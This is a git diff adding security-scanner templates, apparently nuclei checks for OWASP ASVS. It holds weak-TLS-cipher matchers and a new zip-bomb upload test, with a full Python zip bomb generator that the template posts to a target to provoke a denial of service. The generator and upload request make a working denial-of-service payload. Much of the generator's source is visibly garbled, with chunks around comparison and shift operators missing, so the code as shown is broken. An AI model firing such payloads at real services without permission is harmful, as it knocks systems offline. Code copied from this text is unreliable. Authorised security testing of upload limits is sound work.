"TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - 
"TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls12 + max_version: tls12 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + 
words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + 
- "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls13 + max_version: tls13 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - 
"TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - 
"TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index fd5bf0e..325c9f2 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -5,7 +5,7 @@ info: author: righettod,forgedhallpass,RezaSaeedi severity: low reference: - - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security - https://wiki.mozilla.org/Security/Server_Side_TLS - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html - https://ssl-config.mozilla.org/#config=intermediate diff --git a/templates/code/12.1.1.2.yaml b/templates/code/12.1.1.2.yaml new file mode 100644 index 0000000..62b4987 --- /dev/null +++ b/templates/code/12.1.1.2.yaml 
@@ -0,0 +1,59 @@ +id: ASVS-4-0-3-V12-1-1-2 + +info: + name: ASVS 12.1.1.2 (Zipbomb) Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://github.com/ZerosunGitHub/zipbomb + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + +variables: + mode: "quoted_overlap" + num-files: 250 + compressed-size: 21179 + +code: + - engine: + - py + - python + - python3 + source: | + import subprocess + import sys + import os + + mode = os.getenv('mode') + num_files = os.getenv('num-files') + compressed_size = os.getenv('compressed-size') + subprocess.run([sys.executable, "code/source/zipbomb.py", f"--mode={mode}", f"--num-files={num_files}", f"--compressed-size={compressed_size}"]) + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="zipbomb.zip" + Content-Type: application/zip + + {{code_response}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + matchers: + - type: status + name: status_code + status: + - 500 + - 503 +# digest: 490a0046304402203b8787953e9fa8a0e551fc309787addc534c07c2b32f3665f6b307fb8e4cc28802206af2bc67ad42c54ee002eb47b45765e2417ac7bc1ee88414ac0c5c8352bacec1:99354b7c2d97285abe7401b783fba350 \ No newline at end of file diff --git a/templates/code/source/zipbomb.py b/templates/code/source/zipbomb.py new file mode 100644 index 0000000..70a3525 --- /dev/null 
+++ b/templates/code/source/zipbomb.py 
@@ -0,0 +1,768 @@ +#!/usr/bin/env python3 + +import binascii +import bz2 +import getopt +import math +import struct +import sys +import zipfile + + +CHOSEN_BYTE = ord(b"a") # homage to 42.zip + + +# CRC-32 precomputation using matrices in GF(2). Similar to crc32_combine in +# zlib. See https://stackoverflow.com/a/23126768 for a description of the idea. +# Here, we use a 33-bit state where the dummy 33rd coordinate is always 1 +# (similar to homogeneous coordinates). Matrices are represented as 33-element +# lists, where each element is a 33-bit integer representing one column. + +CRC_POLY = 0xedb88320 + +def matrix_mul_vector(m, v): + r = 0 + for shift in range(len(m)): + if (v>>shift) & 1 == 1: + r ^= m[shift] + return r + +def matrix_mul(a, b): + assert len(a) == len(b) + return [matrix_mul_vector(a, v) for v in b] + +def identity_matrix(): + return [1<>shift)&1], m) + return m + +def precompute_crc_matrix_repeated(data, n): + accum = precompute_crc_matrix(data) + # Square-and-multiply algorithm to compute m = accum^n. + m = identity_matrix() + while n > 0: + if n & 1 == 1: + m = matrix_mul(m, accum) + accum = matrix_mul(accum, accum) + n >>= 1 + return m + +def crc_matrix_apply(m, value=0): + return (matrix_mul_vector(m, (value^0xffffffff)|(1<<32)) & 0xffffffff) ^ 0xffffffff + + +# DEFLATE stuff, see RFC 1951. + +class BitBuffer: + def __init__(self): + self.done = [] + self.current = 0 + self.bit_pos = 0 + + def push(self, x, n): + assert x == x % (1<= (8 - self.bit_pos): + self.current |= (x << self.bit_pos) & 0xff + x >>= (8 - self.bit_pos) + n -= (8 - self.bit_pos) + self.done.append(self.current) + self.current = 0 + self.bit_pos = 0 + self.current |= (x << self.bit_pos) & 0xff + self.bit_pos += n + + def push_rev(self, x, n): + mask = (1<>1 + while mask > 0: + self.push(x&mask != 0 and 1 or 0, 1) + mask >>= 1 + + def bytes(self): + out = bytes(self.done) + if self.bit_pos != 0: + out += bytes([self.current]) + return out + +# RFC 1951 section 3.2.2. 
Input is a sym: length dict and output is a +# sym: (code, length) dict. +def huffman_codes_from_lengths(sym_lengths): + bl_count = {} + max_length = 0 + for _, length in sym_lengths.items(): + bl_count.setdefault(length, 0) + bl_count[length] += 1 + max_length = max(max_length, length) + + next_code = {} + code = 0 + for length in range(max_length): + code = (code + bl_count.get(length, 0)) << 1 + next_code[length+1] = code + + result = {} + for sym, length in sorted(sym_lengths.items(), key=lambda x: (x[1], x[0])): + assert next_code[length] >> length == 0, (sym, bin(next_code[length]), length) + result[sym] = next_code[length], length + next_code[length] += 1 + return result + +def print_huffman_codes(sym_codes, **kwargs): + max_sym_length = max(len("{}".format(sym)) for sym in sym_codes) + for sym, code in sorted(sym_codes.items()): + code, length = code + print("{:{}}: {:0{}b}".format(sym, max_sym_length, code, length), **kwargs) + +# RFC 1951 section 3.2.5. Returns a tuple (code, extra_bits, num_extra_bits). +def code_for_length(length): + if length < 3: + return None, None, None + elif length < 11: + base_code, base_length, num_bits = 257, 3, 0 + elif length < 19: + base_code, base_length, num_bits = 265, 11, 1 + elif length < 35: + base_code, base_length, num_bits = 269, 19, 2 + elif length < 67: + base_code, base_length, num_bits = 273, 35, 3 + elif length < 131: + base_code, base_length, num_bits = 277, 67, 4 + elif length < 258: + base_code, base_length, num_bits = 281, 131, 5 + else: + raise ValueError(length) + return base_code + ((length - base_length) >> num_bits), (length - base_length) & ((1<= 11: + if n < 138: + x = n + elif n < 138 + 11 and code_length_lengths[18] < (n - 138) * code_length_lengths[0]: + # It'll be cheaper to cut this 18 block short and do the + # remainder with another full 18 block. 
+ x = n - 11 + else: + x = 138 + bits.push_rev(*code_length_codes[18]) # 7 bits of length to follow + bits.push(x - 11, 7) + n -= x + while n > 0: + bits.push_rev(*code_length_codes[0]) + n -= 1 + # Output a Huffman tree in terms of code lengths. + def output_code_length_tree(sym_lengths): + cur = 0 + for sym, length in sorted(sym_lengths.items()): + skip(sym - cur) + bits.push_rev(*code_length_codes[length]) + cur = sym + 1 + + # Output Huffman tree for literal/length values. + output_code_length_tree(ll_lengths) + + # Output Huffman tree for distance codes. + output_code_length_tree(distance_lengths) + + n = 0 + # A literal byte to start the whole process. + bits.push_rev(*ll_codes[repeated_byte]) + n += 1 + + # Now every pair of 0 bits encodes 258 copies of repeated_byte. + is_even = bits.bit_pos % 2 == 0 + # Including whatever zero bits remain at the end of the bit buffer. + n += (8 - bits.bit_pos + 1) // 2 * 258 + + prefix = bits.bytes() + + bits = BitBuffer() + if not is_even: + bits.push(*distance_codes[0]) + if max_uncompressed_size is not None: + # Push bytes to get within 258 of the max we are allowed. + while (max_uncompressed_size - n) % 1032 >= 258: + bits.push_rev(*ll_codes[285]) + bits.push(*distance_codes[0]) + n += 258 + else: + # Push the stream-end code (256) as far back in the byte as possible. 
+ while bits.bit_pos + ll_lengths[285] + distance_lengths[0] + ll_lengths[256] <= 8: + bits.push_rev(*ll_codes[285]) + bits.push(*distance_codes[0]) + n += 258 + bits.push_rev(*ll_codes[256]) + suffix = bits.bytes() + + if max_uncompressed_size is not None: + num_zeroes = (max_uncompressed_size - n) // 1032 + else: + num_zeroes = compressed_size - len(prefix) - len(suffix) + + n += num_zeroes * 1032 + body = b"\x00" * num_zeroes + + compressed_data = prefix + body + suffix + + if max_uncompressed_size is not None: + assert (max_uncompressed_size - n) < 258, (n, max_uncompressed_size) + else: + assert len(compressed_data) == compressed_size, (len(compressed_data), compressed_size) + + return compressed_data, n, precompute_crc_matrix_repeated(bytes([repeated_byte]), n) + + +# bzip2 stuff + +def bulk_bzip2(repeated_byte, compressed_size=None, max_uncompressed_size=None): + assert (compressed_size is None and max_uncompressed_size is not None) or (compressed_size is not None and max_uncompressed_size is None) + + # 45899235, empirically determined to be the largest amount of data that + # fits into a 900 kB block after the initial bzip2 RLE (each 255 bytes + # becomes 5 bytes; 45899235 * 5 / 255 = 899985). + # https://en.wikipedia.org/w/index.php?title=Bzip2&oldid=890453143#File_format + # says it can fit 45899236, 1 byte more, but in my tests that results in a + # second block being emitted. + block_uncompressed_size = 45899235 + + # Use an actual bzip2 implementation to compress the entire stream, then + # extract from it a single block that we will repeat. This is actually + # bogus, because whatever follows the block header is not necessarily + # byte-aligned, but the assertions will prevent going ahead if things don't + # work out perfectly. 
+ basic = bz2.compress(bytes([repeated_byte])*block_uncompressed_size, 9) + assert len(basic) == 46, basic + header, block, footer, _ = basic[0:4], basic[4:36], basic[36:42], basic[42:] + assert header == b"BZh9", header + assert block.startswith(b"\x31\x41\x59\x26\x53\x59"), block + assert footer == b"\x17\x72\x45\x38\x50\x90", header + block_crc, = struct.unpack(">L", block[6:10]) + + if compressed_size is not None: + num_blocks = (compressed_size - 4 - 10) // 32 + assert (compressed_size - 4 - 10) % 32 == 0 + else: + num_blocks = max_uncompressed_size // block_uncompressed_size + n = num_blocks * block_uncompressed_size + # 2.2.4 https://github.com/dsnet/compress/blob/master/doc/bzip2-format.pdf + stream_crc = 0 + for i in range(num_blocks): + stream_crc = (block_crc ^ ((stream_crc<<1) | (stream_crc>>31))) & 0xffffffff + + crc_matrix = precompute_crc_matrix_repeated(bytes([repeated_byte]), n) + compressed_data = header + block*num_blocks + footer + struct.pack(">L", stream_crc) + return compressed_data, n, crc_matrix + + +# APPNOTE.TXT 4.4.5 +# 8 - The file is Deflated +COMPRESSION_METHOD_DEFLATE = 8 +# 12 - File is compressed using BZIP2 algorithm +COMPRESSION_METHOD_BZIP2 = 12 + +BULK_COMPRESS = { + COMPRESSION_METHOD_BZIP2: bulk_bzip2, + COMPRESSION_METHOD_DEFLATE: bulk_deflate, +} + +# APPNOTE.TXT 4.4.3.2 +# 2.0 - File is compressed using Deflate compression +ZIP_VERSION = 20 +# 4.5 - File uses ZIP64 format extensions +ZIP64_VERSION = 45 +# 4.6 - File is compressed using BZIP2 compression +ZIP_BZIP2_VERSION = 46 + +MOD_DATE = 0x0548 +MOD_TIME = 0x6ca0 + +def zip_version(compression_method=COMPRESSION_METHOD_DEFLATE, zip64=False): + candidates = [ZIP_VERSION] + if compression_method==COMPRESSION_METHOD_BZIP2: + candidates.append(ZIP_BZIP2_VERSION) + if zip64: + candidates.append(ZIP64_VERSION) + return max(candidates) + +# In Zip64 mode, we add a Zip64 extra field for every file (including using +# ZIP64_VERSION instead of ZIP_VERSION) for *every* file, 
whether it is large +# enough to need it or not. Past a certain threshold, every file *does* need it +# anyway. It may be slightly better for compatibility to write every file in +# either Zip64 or non-Zip64 mode. See the block comment in putextended in +# zipfile.c of Info-ZIP Zip 3.0 (though the worst incompatibility has to do with +# data descriptors, which we don't use). +# +# Even in Zip64 mode, we make the assumption that the only field that needs to +# be represented in the Zip64 extra info is uncompressed_size, and not +# compressed_size nor local_file_header_offset (checked with an assertion in +# CentralDirectoryHeader.serialize). This is to make analysis easier (central +# directory headers and local file headers continue to have a fixed size), and +# because the zip file has to be really big for either of those fields to exceed +# 4 GiB—the quoted_overlap method can produce a zip file whose total unzipped +# size is greater than 16 EiB (2^64 bytes) without exceeding either of those +# limits. + +class LocalFileHeader: + def __init__(self, compressed_size, uncompressed_size, crc, filename, compression_method=COMPRESSION_METHOD_DEFLATE, extra_tag=None, extra_length_excess=0): + self.compressed_size = compressed_size + self.uncompressed_size = uncompressed_size + self.crc = crc + self.filename = filename + self.compression_method = compression_method + self.extra_tag = extra_tag + self.extra_length_excess = extra_length_excess + + def serialize(self, zip64=False): + # APPNOTE.TXT 4.5.3 says that in the local file header, unlike the + # central directory header, we must include both uncompressed_size and + # compressed_size in the Zip64 extra field, even if one of them is not + # so big as to require Zip64. + extra = b"" + if zip64: + extra += struct.pack(" 0: + extra += struct.pack(" bomb.zip + {program_name} --num-files=N --max-uncompressed-size=N [OPTIONS...] 
